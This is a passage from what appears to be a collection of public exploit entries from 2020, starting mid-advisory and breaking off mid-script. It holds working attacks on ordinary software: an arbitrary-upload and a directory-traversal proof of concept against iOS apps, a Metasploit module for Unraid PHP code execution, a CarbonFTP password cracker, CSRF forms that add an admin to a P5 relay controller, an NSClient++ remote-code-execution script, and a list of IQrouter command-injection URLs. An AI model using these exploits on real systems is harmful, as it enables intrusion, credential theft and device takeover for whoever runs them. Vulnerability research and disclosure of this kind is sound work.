Store+Organize+Edit+Protect+Import+Download+View+Share your files right
from your iPhone! Transform your
iPhone/iPod touch into a real HardDrive with no extra cable or software.
(Copy of the Homepage: https://apps.apple.com/ch/app/harddrive/id383226784 )
Affected Product(s):
====================
Sebastien BUET
HardDrive v2.1 - Apple iOS Mobile Web Application
Vulnerability Disclosure Timeline:
==================================
2020-04-29: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
An arbitrary file upload web vulnerability has been discovered in the
official Air Sender v1.0.2 iOS mobile application.
The web vulnerability allows remote attackers to upload arbitrary files
to compromise for example the file system of a service.
The arbitrary upload vulnerability is located in the within the
web-server configuration when using the upload module.
Remote attackers are able to bypass the local web-server configuration
by an upload of malicious webshells. Attackers
are able to inject own files with malicious `filen` values in the
`upload` POST method request to compromise the
mobile web-application. The application does not perform checks for
multiple file extensions. Thus allows an attacker
to upload for example to upload a html.js.png file. After the upload the
attacker requests the original url source
with the uploaded file and removes the unwanted extension to execute the
code in the unprotected web-frontend.
The security risk of the vulnerability is estimated as high with a
common vulnerability scoring system count of 7.0.
Exploitation of the web vulnerability requires a low privilege ftp
application user account and no user interaction.
Successful exploitation of the arbitrary file upload web vulnerability
results in application or device compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] ./upload
Vulnerable File(s):
[+] file
Proof of Concept (PoC):
=======================
The arbitrary file upload web vulnerability can be exploited by remote
attackers without user interaction or privileged user accounts.
For security demonstration or to reproduce the web vulnerability follow
the provided information and steps below to continue.
PoC: Vulnerable Source (File Dir Listing Index)
<tr><td width="100px" valign="middle" align="left"><img
src="exploit.html"></td><td width="300px" valign="middle" align="left">
<a href="exploit.html.js">exploit.html.js</a></td> <td width="454px"
valign="middle" align="left">
<em valign="middle" align="center">size: 256.7 Kb
PoC: Exploitation
http://localhost:50071/exploit.html.js
--- PoC Session Logs [POST] --- (file)
http://localhost:50071/
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------9331569428946906291010349387
Content-Length: 263181
Origin: http://localhost:50071
Connection: keep-alive
Referer: http://localhost:50071/
file=exploit.html.js.png&button=Submit
POST: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 381654
-
http://localhost:50071/exploit.html.js
Host: localhost:50071
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
-
http://localhost:50071/exploit.html
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 366735
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Title: Super Backup 2.0.5 for iOS - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-30
# Software: https://apps.apple.com/us/app/super-backup-export-import/id1052684097
# CVE: N/A
Document Title:
===============
Super Backup v2.0.5 iOS - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2200
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
Backup all your iPhone or iPad contacts in 1 tap and export them.
Fastest way to restore contacts from PC or Mac.
Export by mailing the backed up contacts file to yourself. Export
contacts file to any other app on your device.
Export all contacts directly to your PC / Mac over Wifi, no software
needed! Restore any contacts directly from
PC / Mac. Restore contacts via mail. Get the ultimate contacts backup
app now.
(Copy of the Homepage:
https://apps.apple.com/us/app/super-backup-export-import/id1052684097 )
Affected Product(s):
====================
Dropouts Technologies LLP
Product: Super Backup v2.0.5
Vulnerability Disclosure Timeline:
==================================
2020-04-30: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the
official Super Backup v2.0.5 ios mobile web-application.
The vulnerability allows remote attackers to change the application path
in performed requests to compromise the local application
or file-system of a mobile device. Attackers are for example able to
request environment variables or a sensitive system path.
The directory-traversal web vulnerability in the app is located in the
`list` and `download` module with the `path` parameter.
Attackers are able to change the path variable to request the local list
command. By changing the path parameter the validation
mechanism runs into a logic error that turns back the possibility to
request different pathes outside the basic import/export
folder. Thus way the attacker injects for example local path environment
varibales to compromise the local ios web-application.
Exploitation of the directory traversal web vulnerability requires no
privileged web-application user account or user interaction.
Successful exploitation of the vulnerability results in information
leaking by unauthorized file access and mobile application compromise.
Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with
access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information and steps below to continue.
PoC: Payloads
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
/../../../../../../../../../../../../../../../../../../../../../../%00
//.././%00
PoC: Exploitation
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
--- PoC Session Logs [GET]] ---
http://localhost/list?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 174
Content-Type: application/json
Connection: Close
-
http://localhost/download?path=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F%00
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
-
GET: HTTP/1.1 200 OK
Content-Length: 174
Content-Type: application/json
Connection: Close
-
Opening the url allows to download the list file json with content path
output
[{"path":"../../../../../../../../../../../../ "size":21961}]
References:
http://localhost/list?path=
http://localhost/download?path=
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
--
VULNERABILITY LABORATORY - RESEARCH TEAM
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
'Description' => %q{
This module exploits two vulnerabilities affecting Unraid 6.8.0.
An authentication bypass is used to gain access to the administrative
interface, and an insecure use of the extract PHP function can be abused
for arbitrary code execution as root.
},
'Author' =>
[
'Nicolas CHATELAIN <n.chatelain@sysdream.com>'
],
'References' =>
[
[ 'CVE', '2020-5847' ],
[ 'CVE', '2020-5849' ],
[ 'URL', 'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/' ],
[ 'URL', 'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/' ]
],
'License' => MSF_LICENSE,
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 10 2020'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The URI of the Unraid application', '/'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET'
)
unless res
return CheckCode::Unknown('Connection failed')
end
unless res.code == 200
return CheckCode::Safe('Unexpected reply')
end
/\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body
if version && Gem::Version.new(version) == Gem::Version.new('6.8.0')
return CheckCode::Appears("Unraid version #{version} appears to be vulnerable")
end
CheckCode::Safe
end
def exploit
begin
vprint_status('Sending exploit code')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'webGui/images/green-on.png/'),
'method' => 'GET',
'encode_params' => false,
'vars_get' =>
{
'path' => 'x',
'site[x][text]' => Rex::Text.uri_encode("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", 'hex-normal')
}
)
if res.nil?
print_good('Request timed out, OK if running a non-forking/blocking payload...')
elsif res.code == 302
fail_with(Failure::NotVulnerable, 'Redirected, target is not vulnerable.')
else
print_warning("Unexpected response code #{res.code}, please check your payload.")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
end
# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption
# Date: 2020-04-20
# Author: hyp3rlinx
# Vendor:
# CVE: CVE-2020-6857
import time, string, sys, argparse, os, codecs
#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version.
#This should be compatible for Python 2 and 3 versions now, tested successfully.
#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947
key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.
#Password is stored here:
#C:\Users\<VICTIM>\AppData\Roaming\Neowise\CarbonFTPProjects\<FILE>.CFTP
#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================
def carbonftp_conf(conf_file):
p=""
pipe=-1
passwd=""
lst_of_passwds=[]
try:
for p in conf_file:
idx = p.find("Password=STRING|")
if idx != -1:
pipe = p.find("|")
if pipe != -1:
passwd = p[pipe + 2: -2]
print(" Password found: "+ passwd)
lst_of_passwds.append(passwd)
except Exception as e:
print(str(e))
return lst_of_passwds
def reorder(lst):
k=1
j=0
for n in range(len(lst)):
k+=1
j+=1
try:
tmp = lst[n+k]
a = lst[n+j]
lst[n+j] = tmp
lst[n+k] = a
except Exception as e:
pass
return ''.join(lst)
def dec2hex(dec):
tmp = str(hex(int(dec)))
return str(tmp[2:])
#Updated for Python version compatibility.
def hex2ascii(h):
h=h.strip()
passwd=""
try:
passwd = codecs.decode(h, "hex").decode("ascii")
except Exception as e:
print("[!] In hex2ascii(), not a valid hex string.")
exit()
return passwd
def chunk_passwd(passwd_lst):
lst = []
for passwd in passwd_lst:
while passwd:
lst.append(passwd[:chunk_sz])
passwd = passwd[chunk_sz:]
return lst
def strip_non_printable_char(str):
return ''.join([x for x in str if ord(x) > 31 or ord(x)==9])
cnt = 0
passwd_str=""
def deob(c):
global cnt, passwd_str
tmp=""
try:
tmp = int(c) - int(key, 16)
tmp = dec2hex(tmp)
except Exception as e:
print("[!] Not a valid CarbonFTP encrypted password.")
exit()
b=""
a=""
#Seems we can delete the second char as its most always junk.
if cnt!=1:
a = tmp[:2]
cnt+=1
else:
b = tmp[:4]
passwd_str += strip_non_printable_char(hex2ascii(a + b))
hex_passwd_lst = list(passwd_str)
return hex_passwd_lst
def no_unique_chars(lst):
c=0
k=1
j=0
for i in range(len(lst)):
k+=1
j+=1
try:
a = lst[i]
b = lst[i+1]
if a != b:
c+=1
elif c==0:
print("[!] Possible one char password?: " +str(lst[0]))
return lst[0]
except Exception as e:
pass
return False
def decryptor(result_lst):
global passwd_str, sz
print(" Decrypting ... \n")
for i in result_lst:
print("[-] "+i)
time.sleep(0.1)
lst = deob(i)
#Re-order chars to correct sequence using custom swap function (reorder).
reordered_pass = reorder(lst)
sz = len(reordered_pass)
#Flag possible single char password.
no_unique_chars(lst)
print("[+] PASSWORD LENGTH: " + str(sz))
if sz == 9:
return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " +
reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)
#Shorter passwords less then nine chars will have several candidates
#as they get padded with repeating chars so we return those.
passwd_str=""
return reordered_pass
def display_cracked_passwd(sz, passwd):
if sz==9:
print("[*] PASSWORD CANDIDATES: "+ passwd + "\n")
else:
print("[*] DECRYPTED PASSWORD: "+passwd + "\n")
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
return parser.parse_args()
def main(args):
global passwd_str, sz
victim=""
if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()
print("[+] Neowise CarbonFTP v1.4")
time.sleep(0.1)
print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
time.sleep(0.1)
print("[+] Version 2 Exploit fixed for Python 3 compatibility")
time.sleep(0.1)
print("[+] Discovered and cracked by hyp3rlinx")
time.sleep(0.1)
print("[+] ApparitionSec\n")
time.sleep(1)
#Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
if args.user:
victim = args.user
os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
dir_lst = os.listdir(".")
for c in dir_lst:
f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
#Get encrypted password from conf file
passwd_enc = carbonftp_conf(f)
#Break up into 5 byte chunks as processed by the proprietary decryption routine.
result_lst = chunk_passwd(passwd_enc)
#Decrypt the 5 byte chunks and reassemble to the cleartext password.
cracked_passwd = decryptor(result_lst)
#Print cracked password or candidates.
display_cracked_passwd(sz, cracked_passwd)
time.sleep(0.3)
passwd_str=""
f.close()
#Crack a single password -p flag.
if args.encrypted_password:
passwd_to_crack_lst = []
passwd_to_crack_lst.append(args.encrypted_password)
result = chunk_passwd(passwd_to_crack_lst)
#Print cracked password or candidates.
cracked_passwd = decryptor(result)
display_cracked_passwd(sz, cracked_passwd)
if __name__=="__main__":
parser = argparse.ArgumentParser()
if len(sys.argv)==1:
parser.print_help(sys.stderr)
exit()
main(parse_args())
# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)
# Google Dork:jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Product web page: https://www.p5.hu
# Affected version: 1.0.20, 1.0.11
# CVE : N/A
<!--
P5 FNIP-8x16A/FNIP-4xSH CSRF Stored Cross-Site Scripting
Vendor: P5
Product web page: https://www.p5.hu
Affected version: 1.0.20, 1.0.11
Summary: The FNIP-8x16A is an eight channel relay module used for switching any
type of load that doesn’t exceed the specifications. Via its built-in web site
and TCP/IP communication, the outputs and inputs can be controlled and monitored
from standard network capable devices such as computers, smartphones, web-tablets,
etc. either locally or via the network. The module can be used independently or
as part of a complex control system in residential and commercial installations.
Desc: The controller suffers from CSRF and XSS vulnerabilities. The application
allows users to perform certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits a malicious web
site. Input passed to several GET/POST parameters is not properly sanitised before
being returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in context of an affected site.
Tested on: Linux
CGI
Vulnerabiity discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5564
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5564.php
29.01.2020
-->
<!-- CSRF add admin user -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="uno" value="1" /> <!-- User number (user1) -->
<input type="hidden" name="un" value="testingus" /> <!-- Username -->
<input type="hidden" name="role" value="2" /> <!-- 2: Admin, 1: Actor, 0: Observer -->
<input type="hidden" name="enabled" value="1" />
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- CSRF change admin password -->
<html>
<body>
<form action="http://192.168.1.17:83/user.cgi" method="POST">
<input type="hidden" name="un" value="admin" /> <!-- Defaults: admin:futurenow -->
<input type="hidden" name="pw" value="123456" />
<input type="hidden" name="pw2" value="123456" />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
<!-- XSS modify labels -->
<html>
<body>
<form action="http://192.168.1.17:83/config.html" method="POST">
<input type="hidden" name="lab1" value="Channel1" />
<input type="hidden" name="lab2" value="Channel2" />
<input type="hidden" name="lab3" value="Channel3" />
<input type="hidden" name="lab4" value='"><script>confirm(251)</script>' />
<input type="hidden" name="lab12" value="etc." />
<input type="submit" value="Zubmit" />
</form>
</body>
</html>
# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: kindredsec
# Vendor Homepage: https://nsclient.org/
# Software Link: https://nsclient.org/download/
# Version: 0.5.2.35
# Tested on: Microsoft Windows 10 Pro (x64)
# CVE: N/A
#
# NSClient++ is a monitoring agent that has the option to run external scripts.
# This feature can allow an attacker, given they have credentials, the ability to execute
# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
# Default, this leads to privileged code execution.
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup as bs
import urllib3
import json
import sys
import random
import string
import time
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def generateName():
letters = string.ascii_lowercase + string.ascii_uppercase
return ''.join(random.choice(letters) for i in range(random.randint(8,13)))
def printStatus(message, msg_type):
C_YELLOW = '\033[1;33m'
C_RESET = '\033[0m'
C_GREEN = '\033[1;32m'
C_RED = '\033[1;31m'
if msg_type == "good":
green_plus = C_GREEN + "[+]" + C_RESET
string = green_plus + " " + message
elif msg_type == "info":
yellow_ex = C_YELLOW + "[!]" + C_RESET
string = yellow_ex + " " + message
elif msg_type == "bad":
red_minus = C_RED + "[-]" + C_RESET
string = red_minus + " " + message
print(string)
# This function adds a new external script containing the desired
# command, then saves the configuration
def configurePayload(session, cmd, key):
printStatus("Configuring Script with Specified Payload . . .", "info")
endpoint = "/settings/query.json"
node = { "path" : "/settings/external scripts/scripts",
"key" : key }
value = { "string_data" : cmd }
update = { "node" : node , "value" : value }
payload = [ { "plugin_id" : "1234",
"update" : update } ]
json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
out = session.post(url = base_url + endpoint, json=json_data, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
sys.exit(1)
printStatus("Added External Script (name: " + key + ")", "good")
time.sleep(3)
printStatus("Saving Configuration . . .", "info")
header = { "version" : "1" }
payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
session.post(url = base_url + endpoint, json=json_data, verify=False)
# Since the application needs to be restarted after making changes,
# this function reloads the application, and waits for it to come back.
def reloadConfig(session):
printStatus("Reloading Application . . .", "info")
endpoint = "/core/reload"
session.get(url = base_url + endpoint, verify=False)
# Wait until the application successfully reloads by making a request
# every 10 seconds until it responds.
printStatus("Waiting for Application to reload . . .", "info")
time.sleep(10)
response = False
count = 0
while not response:
try:
out = session.get(url = base_url, verify=False, timeout=10)
if len(out.content) > 0:
response = True
except:
count += 1
if count > 10:
printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
sys.exit(1)
else:
continue
# This function makes the call to the new external script to
# ultimately execute the code.
def triggerPayload(session, key):
printStatus("Triggering payload, should execute shortly . . .", "info")
endpoint = "/query/" + key
try:
session.get(url = base_url + endpoint, verify=False, timeout=10)
except requests.exceptions.ReadTimeout:
printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
sys.exit(0)
# Before setting up the exploit, this function makes sure the
# required feature (External Scripts) is enabled on the application.
def enableFeature(session):
printStatus("Enabling External Scripts Module . . .", "info")
endpoint = "/registry/control/module/load"
params = { "name" : "CheckExternalScripts" }
out = session.get(url = base_url + endpoint, params=params, verify=False)
if "STATUS_OK" not in str(out.content):
printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
sys.exit(1)
# This function obtains an authentication token that gets added to all
# remaining headers.
def getAuthToken(session):
printStatus("Obtaining Authentication Token . . .", "info")
endpoint = "/auth/token"
params = { "password" : password }
auth = session.get(url = base_url + endpoint, params=params, verify=False)
if "auth token" in str(auth.content):
j = json.loads(auth.content)
authToken = j["auth token"]
printStatus("Got auth token: " + authToken, "good")
return authToken
else:
printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
sys.exit(1)
parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
args = parser.parse_args()
if len(sys.argv) < 4:
parser.print_help()
sys.exit(1)
# Build base URL, grab needed arguments
base_url = "https://" + args.t + ":" + args.P
printStatus("Targeting base URL " + base_url, "info")
password = args.p
cmd = args.c
# Get first auth token, and add it to headers of session
s = requests.session()
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Generate a random name, enable the feature, add the payload,
# then reload.
randKey = generateName()
enableFeature(s)
configurePayload(s, cmd, randKey)
reloadConfig(s)
# Since application was reloaded, need a new auth token.
token = getAuthToken(s)
s.headers.update({ "TOKEN" : token})
# Execute our code.
triggerPayload(s, randKey)
# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution
# Date: 2020-04-21
# Exploit Author: drakylar
# Vendor Homepage: https://evenroute.com/
# Software Link: https://evenroute.com/iqrouter
# Version: IQrouter firmware up to 3.3.1
# Tested on: IQrouter firmware 3.3.1
# CVE : N/A
#!/usr/bin/env python3
import argparse
from sys import argv, exit
try:
import requests
except ImportError:
print("Install requests lib! pip3 install requests")
print("""
#######################################################################
# IQrouter multiple RCE and other vulnerabilities #
# by drakylar (Shaposhnikov Ilya) #
# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #
# CVE-2020-11967 CVE-2020-11968 #
#######################################################################
""")
rce_setup = [
[
"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'",
"RCE /vlanTag (vlan_tag param)"
],
[
"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'",
"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2",
"RCE /screen9 (s2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2",
"RCE /screen9 (s1 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'",
"RCE /screen9 (p2 param)"
],
[
"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2",
"RCE /screen9 (p1 param)"
],
[
"/cgi-bin/luci/er/screen4?save_isp='`{}`",
"RCE /screen4 (save_isp param)"
],
[
"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'",
"RCE /screen2 set_wan_modem_interfaces param)"
],
[
"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'",
"RCE /screen2 find_ip_address_conflict param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_question='`{}`'",
"RCE /screen10 (set_security_question param)"
],
[
"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1",
"RCE /screen10 (set_security_answer param)"],
[
"/cgi-bin/luci/er/screen1?zonename='`{}`'",
"RCE /screen1 (zonename param)"
],
[
"/cgi-bin/luci/er/register?email=`{}`",
"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)"
]
]
rce_any = [
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1",
"RCE /wifi (s2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7",
"RCE /wifi (s1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'",
"RCE /wifi (p2 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4",
"RCE /wifi (p1 param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_5g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guestwifi_2g_ssid param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7",
"RCE /wifi (guest_key param)"
],
[
"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7",
"RCE /wifi (enable_guestwifi param)"
],
[
"/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123",
"RCE /screen11.1 (email param)"
],
[
"/cgi-bin/luci/er/reboot_link?link='`{}`'",
"RCE /reboot_link (link param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/",
"RCE /diag_wifi (htm5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/",
"RCE /diag_wifi (htm2ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/",
"RCE /diag_wifi (c5ghz param)"
],
[
"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/",
"RCE /diag_wifi (c2ghz param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/",
"RCE /diag_set_static_wan (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/",
"RCE /diag_set_static_wan (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/",
"RCE /diag_set_static_wan (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/",
"RCE /diag_set_static_wan (dns param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/",
"RCE /diag_set_static_modem (static_ip param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/",
"RCE /diag_set_static_modem (net_mask param)"
],
[
"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/",
"RCE /diag_set_static_modem (gateway param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/",
"RCE /diag_set_device_name_and_sync (device_name param)"
],
[
"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/",
"RCE /diag_set_device_name (device_name param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/",
"RCE /diag_pppoe_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/",
"RCE /diag_pppoe_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/",
"RCE /diag_pppoe (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/",
"RCE /diag_pppoe (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/",
"RCE /diag_pppoa_update (wan_username param)"
],
[
"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/",
"RCE /diag_pppoa_update (wan_password param)"
],
[
"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/",
"RCE /diag_pppoa (wan_username param)"
],
[
